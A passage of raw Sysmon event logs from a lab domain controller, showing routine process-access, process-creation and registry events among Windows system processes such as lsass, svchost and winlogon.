10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0800-00000000A301}720816C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0900-00000000A301}796800C:\Windows\system32\winlogon.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.504{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bb7055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.502{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596724C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0800-00000000A301}720C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0500-00000000A301}640C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.361{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.361{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.346{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46868|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.346{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 